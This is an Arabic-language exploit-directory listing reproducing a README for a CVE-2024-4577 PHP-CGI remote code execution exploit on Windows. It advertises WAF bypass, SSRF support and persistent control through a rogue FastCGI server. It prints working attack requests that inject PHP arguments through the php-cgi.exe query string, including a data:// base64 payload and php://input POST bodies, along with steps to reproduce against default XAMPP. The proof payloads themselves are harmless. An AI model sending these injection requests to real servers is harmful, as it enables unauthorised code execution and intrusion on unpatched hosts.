Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-4577-PHP-RCE — استغلال لـ CVE-2024-4577 PHP-CGI RCE على Windows، مع تجاوز WAF ودعم SSRF. يوفر متغيرات استغلال متعددة للسيناريوهات الافتراضية وWAF وSSRF. | Kitploit
أدوات/GitHubGitHub/a-roshbaik/cve-2024-4577-php-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراق
GitHuba-roshbaik/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

استغلال لـ CVE-2024-4577 PHP-CGI RCE على Windows، مع تجاوز WAF ودعم SSRF. يوفر متغيرات استغلال متعددة للسيناريوهات الافتراضية وWAF وSSRF.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
4منذ 2 سنواتلم تتم المراجعة بعد
مشاركة

CVE-2024-4577-PHP-RCE

نظرة عامة على المشروع والمبدأ

  • أول EXP في العالم لثغرة CVE-2024-4577 PHP-CGI RCE باستخدام بيئة PHP الافتراضية (XAMPP).
  • أول استغلال في العالم لثغرة CVE-2024-4577 PHP-CGI RCE يستخدم بيئة PHP الافتراضية. يشارك استغلالًا أصليًا، ويدعم SSRF، ويدعم تجاوز WAF.
  • يحقق RCE في بيئة PHP الافتراضية. المبدأ: cgi.force_redirect + REDIRECT-STATUS.
  • يضيف EXP أصليًا جديدًا يدعم أسلوب تجاوز WAF. المبدأ: إنشاء خادم FastCGI + التواصل عبر بروتوكول FastCGI.
  • يضيف EXP أصليًا جديدًا يدعم أسلوب سيناريو SSRF. المبدأ: بروتوكول data:// + طلب GET.

مزايا EXP 1

  • يمكن تحقيق RCE دون الحاجة إلى allow_url_include أو auto_prepend_file أو auto_append_file. يمكن تضمين أي ملفات وملفات PHP.
  • لن تظهر الكلمات المفتاحية التي يعترضها WAF عادةً مثل allow_url_include و و.
auto_prepend_file
auto_append_file
  • لن يتم تسجيل جميع اتصالات خادم FastCGI بواسطة WAF.
  • يستمع على منفذ جديد، وبالتالي يحقق تحكمًا مستدامًا في خادم PHP، بشكل مستقل عن Apache وPHP.
  • ملخص الثغرة

    المعلومةالقيمة
    اسم الثغرةPHP RCE
    معرف الثغرةCVE-2024-4577
    مستوى الخطورةعالٍ
    نوع الثغرةRCE
    صعوبة الاستغلالمنخفضة

    الإصدارات المتأثرة

    • PHP إصدار ويندوز 8.3.0 <= الإصدار المتأثر < 8.3.8
    • PHP إصدار ويندوز 8.2.0 <= الإصدار المتأثر < 8.2.20
    • PHP إصدار ويندوز 8.1.0 <= الإصدار المتأثر < 8.1.29
    • PHP إصدار ويندوز الإصدار المتأثر == 8.0.x
    • PHP إصدار ويندوز الإصدار المتأثر == 7.x
    • PHP إصدار ويندوز الإصدار المتأثر == 5.x
    • XAMPP إصدار ويندوز 8.2.0 <= الإصدار المتأثر <= 8.2.12
    • XAMPP إصدار ويندوز 8.1.0 <= الإصدار المتأثر <= 8.1.25
    • XAMPP إصدار ويندوز الإصدار المتأثر == 8.0.x
    • XAMPP إصدار ويندوز الإصدار المتأثر == 7.x
    • XAMPP إصدار ويندوز الإصدار المتأثر == 5.x

    EXP 1

    يمكن استخدامه في سيناريو تجاوز WAF + السيناريو الافتراضي:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
    

    مثال:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
    

    EXP 2

    يمكن استخدامه في سيناريو SSRF + السيناريو الافتراضي:

    root@kitploit:~
    http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
    

    EXP 3

    يمكن استخدامه في السيناريو الافتراضي:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    
    <?php die("Te"."sT");?>
    

    EXP 4

    يمكن استخدامه في السيناريو الافتراضي:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    REDIRECT-STATUS: XCANWIN
    
    <?php die("Te"."sT");?>
    

    إعادة الإنتاج

    1. بيئة الخادم:
    root@kitploit:~
    XAMPP Windows版 8.2.12
    
    1. تنزيل وتثبيت XAMPP على الخادم:
    root@kitploit:~
    https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
    
    或者自主去这里挑受影响版本:https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
    
    
    1. إعداد الخادم
    root@kitploit:~
    无需任何修改,保持默认配置
    
    1. استخدام EXP من جانب العميل
    root@kitploit:~
    使用上述EXP进行测试
    
    1. التحقق
    root@kitploit:~
    观察是否返回字符串 "TesT" 或者服务端system.ini文件内容
    
    تنزيل الأداة